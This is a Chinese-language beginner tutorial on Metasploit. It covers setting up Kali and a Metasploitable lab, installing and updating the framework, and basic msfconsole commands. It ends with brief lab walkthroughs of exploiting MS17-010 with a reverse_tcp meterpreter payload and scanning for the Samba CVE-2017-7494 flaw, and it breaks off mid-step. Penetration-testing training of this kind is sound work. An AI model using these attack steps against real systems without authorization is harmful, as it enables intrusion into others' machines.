首先介绍一下METASPLOIT 这款工具
1. msf全称:metasploit是一款开源免费可下载的漏洞框架,通过此漏洞框架任何人都可以轻易的成为“黑客”利用工具攻击那些补丁不完善的漏洞,现在用于安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境,本身附带这2000多个软件漏洞的专业级攻击工具。
2.要安装METASPLOIT 的硬件需求;硬盘空间要大于10GB,最好是40GB大小,内存大于2GB就可以,处理器的话大于500MHZ,网络的话你可以使用Cat5接口进行访问。请确保你的网络设备有DHCP,没有的话自行分配ip,简易装两台操作系统一台kali系统,一台测试系统,方便测试、建议使用VMware Player虚拟机方便操作免费,不怕失误,
如果你想对kali进行升级命令指令是:“apt-get update && apt-get upgrade”
其他的话:Kali系统的下载地址是:http://www.kali.org/downloads/
kail下载地址 https://pan.baidu.com/s/1c05BnlI
http://cdimage.kali.org/kali-weekly/
http://sourceforge.net/projects/Metasploitable/files/Metasploitable2/
注意:测试系统下载下来后是zip格式的。解压后使用VM打开。如果是VMware的,直接打开用VMware打开Metasploitable.vmx文件即可。Metasploitable系统的默认账号和密码是msfadmin:msfadmin
如果你想了解更多关于Metasploitable的信息,你可以去下面这个网站:https://community.rapid7.com/docs/DOC-1875
3.MRYSDPLOIT的专业术语讲解;
渗透攻击{EXPLOIT}:是指攻击者利用系统或者应用,服务中的安全漏洞,进行攻击,现在流行的攻击技术一般是:缓冲区溢出,WEB应用程序漏洞攻击,利用配置错误等
4.如何更新metasploit
1.替换yum源,把kail原有更新源#号注释掉,操作的话首先 vi /etc/apt/sources.list 进入文件i 键进入输入模式将文档中的原有的#去掉ESC 按shift +冒号 输入wq 保存退出
在输入cat /etc/apt/sources.list 执行文件即可
kali官方源
deb http://http.kali.org/ kali-rolling main non-free contrib
deb-src http://http.kali.org/ kali-rolling main non-free contrib
中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
接下来就是安装metasploit
root@bogon:~# apt-get update
root@kali:~# apt-get install metasploit-framework//安装msf框架
root@kali:~#msfconsole //发现有提示数据库未启动,退出msf启动数据库
root@kali:~# systemctl start postgresql //启动数据库
root@kali:~# systemctl enable postgresql //允许开机自启动
root@kali:~# msfdb init //构建数据库缓存
root@kali:~#msfconsole
注意:如果更新完msf出现才下问题
root@kaliew:~# msfconsole
[*] Bundler failed to load and returned this error:
'cannot load such file -- bundler/setup'
[*] You may need to uninstall or upgrade bundler
解决方法:
root@kaliew:~# sudo gem install bundler
root@kaliew:~# bundle update celluloid
接下来介绍一些msf的基本命令:1.执行?命令:帮助菜单
2.另一个用法:在?后面加命令(之间有空格)。
3.search 搜索模块名和描述
4.use使用命令,
5.Banner命令,显示一个MSF的banner
6.connect连接一个主机,连接到百度的80端口
7.exit退出MSF
8.info 显示一个或多个模块的信息,例如ms08-067的模块
9.irb进入irb脚本模式
10.jobs跟window的任务管理器一样:kill:杀死一个作业(和结束进程的作用一样)。
loadpath:加载一个模块的路径。
quit:退出MSF。
load:加载一个插件。
resource:运行储存一个文件中的命令。
route:查看一个会话的路由信息。
save:保存动作
11.set:给一个变量赋值
12.show options显示给所有类型的模块
接下来演示下网络服务器攻击渗透测试(MS17-010)
要准备的环境:靶机window7 和攻击机kali
在kali集中输入msfconsole进入msf
输入search ms17-010选择 这里search ms17-010表示详细信息,用use选择show options 表示血药配置的信息 info 表示详细信息
接下来配置首先要知道你靶机的ip
其中lhost表示攻击方的ip rhsot表示靶机 run和exploit 表示开始 设置 set payload windows/x64/meterpreter/reverse_tcp
再来个实验利用samba服务漏洞入侵linux主机CVE-2017-7494
首先要扫描目标主机上开放的端口和服务,用nmap,命令如下:
nmap -sS -Pn -A 靶机ip
2.打开你的msf 输入search samba 用uesuse auxiliary/scanner/smb/smb_version